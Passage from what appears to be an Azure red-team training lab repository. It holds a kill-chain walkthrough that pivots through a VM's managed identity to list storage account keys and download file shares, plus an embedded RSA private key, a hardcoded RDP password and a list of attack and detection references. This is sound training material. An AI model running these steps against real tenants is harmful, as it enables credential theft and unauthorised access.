WindowsVM internal IP 33 | az vm run-command invoke --command-id RunPowerShellScript --name <\WindowsVM> -g <\ResourceGroup> --script "ipconfig" 34 | 35 | - RDP in via local port forwarding 36 | ssh -i blobsecret.txt -L 3389:<\internal-IP>:3389 azureuser@<\PublicIp> 37 | xfreerdp /u:user1 /p:"Passw0rd!" /v:127.0.0.1 +clipboard /w:1600 /h:900 /cert-ignore 38 | 39 | - WindowsVM also runs as a Managed Identity -> enumerate roles assigned to it 40 | az login --identity 41 | az role assignment list --all 42 | 43 | - WindowsVM has Storage Account Contributor role on the storage account 44 | az storage account list 45 | az storage share list --account-name <\StorageAccountName> 46 | az storage account keys list -g <\ResourceGroup> -n <\StorageAccountName> 47 | az storage file list --share-name <\ShareName> --account-name <\StorageAccountName> --account-key <\KeyValue> 48 | 49 | az storage file download --path <\PathName> --share-name <\ShareName> --account-name <\StorageAccountName> --account-key <\KeyValue> 50 | -------------------------------------------------------------------------------- /kc2/secret.txt: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEowIBAAKCAQEAxQ88yy2vf6y7a2X6PYq9az0BmVgoSNPlPuEaXSrfIrsFiZ0i 3 | Tg2EuBhCAoF3NvjES/f9wXp+ZoVspsXSMtbwC4uJ/DOFDEOx/cGUojDbi/3k2eOZ 4 | vx8VLS0Zxz+ABKGe+d0fYOPv8mqGHnIeBg/vlUiAlVQqXkKhpEMCoDKQ2MGF84+H 5 | 6+3b3K3s3SxDuAZ0/1VakauIWpBzl5CoVCf3h+OEJKnQdinLXZCE5d5OISt2iP38 6 | DH+liMhf9zcQLfiKnFP+kCsU8/G4hOElQJttQ3D2n5X/6YPxTMcq27dk52WsGduv 7 | MSxELhGL5B8OOKw13AQwzB34DaMskWIZY1a8twIDAQABAoIBABzpKmMotbnGjsyn 8 | 7nm+9CFalvR3cZmVtOlvvx1yH8CJrbtN2W2YICOeM3kIo4PmJW572LfdD9RcuN8S 9 | 4M7ip98ZvsnIiTmOaPuwvey5vEwimMO616Cpn8K7/i80SsTjLV69KVBewKJRLJIk 10 | 7fC3v8+oDm1aJskjf3GI/0afhI64O20nB9r/GJ6zm/m/pl2UkMbVvOV8XIIhN7t2 11 | t+gq9xeIJGLWZGnDDrb6zKcI9n13b1IFzpA3xXstMbWFLvJrlzQcnGtwQ4BhZN9J 12 | uqO2g8Z7K9B0wggr5gNKO6YG4Lnt9ajb2OSxQvHnqmBn6LUX5d1e2uUhDMf2UoPH 13 | 50rNJSECgYEA+xicSnTOfq62SQlHk1+oJ07EFK+se51VgyJ4IMT3q131awcuJ5XS 14 | NPPrnWbqSer8KGzDNnoakrELUdsWpEAaWM57PATH6F6nq5rupB8+h4EzVfGzFRlB 15 | TnbRcbd64xE/KEMa/Qfg1UtaLLBfdkoV3sZADUA4LpSDDE7ADfpmvQcCgYEAyOh2 16 | qUT9ImWUvIa3nAz+oU7yP6WGHm6IqVmvxtLR2ft2jcKXSjGJOwjSXPGH9TyoG9R4 17 | vUOhA79pbcgFW6v7tIOzat3oKv7BASdvZ475Yvn+uzv+6e/QFxNnafOhsGHcS5W/ 18 | WDvtluYOB2razSD47xSTU/pW/8m3gOFBBVjlxtECgYBnA47DQS6ibH0ec68ouBrd 19 | nYP2VKg3wrGdbhvIneZaKN8RvM1jsiSeUt/8IIfIMZ6n2w8vn2KdggL53x9n3WCx 20 | xGxskC2PmJ3DWnnDXYoiv4/XF6T35/eSAE8nDzZcR+wYUYeV/ZBxEUv6f5V6iyRz 21 | 0/PdO9aQzZ8CAqDqWyuhKwKBgDfoIGUYEozI0avonR1qrEy9CEJX0EuVnKfrkjN0 22 | pPrQs/vcw3bc9AAeg1Njzt6aY3ljFbotIJhHYpIvD/ajlCZ2Y64AVEPqolCs5Z5e 23 | td0qDg2SM2xr1G8nciaUqlDH2qKZ6CYofwP3vr2nqX1diIgXJKxAxIbnXg4aIJrZ 24 | Uw+RAoGBAKIIHQ6aKFJHTYMxEve42pIH4yWDzu2Y5LFUbUbst7pgJTbavZdO3GVn 25 | 8VNsOXmWFmcBwqkPadenwdTo3Pgci8s+y+JDe9lBeKacSbDOMRCF2+7BCfNA6/nZ 26 | T0+wamRQ1aYS177HOAOjNMakNG9nQLfchipoN+Ia/5x1OhNT8D/U 27 | -----END RSA PRIVATE KEY----- 28 | -------------------------------------------------------------------------------- /kc2/super-secret-file.txt: -------------------------------------------------------------------------------- 1 | Congratulations! You have completed Kill-Chain #2 2 | -------------------------------------------------------------------------------- /resources.txt: -------------------------------------------------------------------------------- 1 | === Azure and Azure AD Resources === 2 | # Attacking: 3 | https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md 4 | https://github.com/Kyuu-Ji/Awesome-Azure-Pentest 5 | https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a 6 | https://github.com/rootsecdev/Azure-Red-Team 7 | https://o365blog.com/aadkillchain/ 8 | https://www.netspi.com/blog/technical/ 9 | https://github.com/netspi/microburst/ 10 | https://pentestbook.six2dez.com/enumeration/cloud/azure 11 | https://improsec.com/tech-blog/read2own 12 | https://m365internals.com/2021/11/30/lateral-movement-with-managed-identities-of-azure-virtual-machines/ 13 | https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/Azure.md 14 | https://medium.com/xm-cyber/privilege-escalation-and-lateral-movement-on-azure-part-1-47e128cfdc06 15 | https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference 16 | https://posts.specterops.io/automating-azure-abuse-research-part-1-30b0eca33418 17 | https://posts.specterops.io/tagged/azure 18 | 19 | # Detection and Response: 20 | https://docs.microsoft.com/en-gb/azure/active-directory/identity-protection/concept-identity-protection-risks#sign-in-risk 21 | https://www.vansurksum.com/2020/04/07/azure-ad-identity-protection-deep-dive/ 22 | https://cloudbrothers.info/en/azure-dominance-paths/ 23 | https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries 24 | https://www.inversecos.com/2022/05/detection-and-compromise-azure-key.html 25 | https://www.inversecos.com/2022/01/how-to-detect-and-compromise-azure.html 26 | https://www.inversecos.com/2021/10/how-to-backdoor-azure-applications-and.html 27 | https://www.inversecos.com/2021/12/how-to-detect-malicious-azure.html 28 | https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-simulate-risk 29 | https://github.com/uglide/azure-content/blob/master/articles/active-directory/active-directory-identityprotection.md 30 | https://docs.microsoft.com/en-us/security/compass/incident-response-playbooks 31 | https://docs.microsoft.com/en-us/azure/defender-for-cloud/managing-and-responding-alerts 32 | https://docs.microsoft.com/en-us/microsoft-365/security/defender/incidents-overview?view=o365-worldwide 33 | https://docs.microsoft.com/en-us/azure/sentinel/tutorial-respond-threats-playbook?tabs=LAC 34 | https://docs.microsoft.com/en-us/azure/architecture/solution-ideas/articles/microsoft-sentinel-automated-response 35 | 36 | # Other free Labs: 37 | https://github.com/cheahengsoon/Penetration-Testing-Azure-for-Ethical-Hackers 38 | https://github.com/azurecitadel/azure-security-lab 39 | https://github.com/XMCyber/XMGoat 40 | Build your own -> https://twitter.com/msft_hiker/status/1516163983421624320 41 | Microsoft 365 Developer Account -> https://developer.microsoft.com/en-us/microsoft-365/dev-program 42 | 43 | # Paid Labs: 44 | Pentester Academy CARTP - https://bootcamps.pentesteracademy.com/course/ad-azure-sept-22 45 | Offensive Azure Security Professional (OASP) - https://cloudbreach.io/labs/ 46 | HTB BlackSkey labs - https://www.hackthebox.com/business/professional-labs/cloud-labs-blacksky 47 | CyberWarfare Multi Cloud labs - https://www.cyberwarfare.live/trainings/certified-hybrid-multi-cloud-red-team-specialist 48 | --------------------------------------------------------------------------------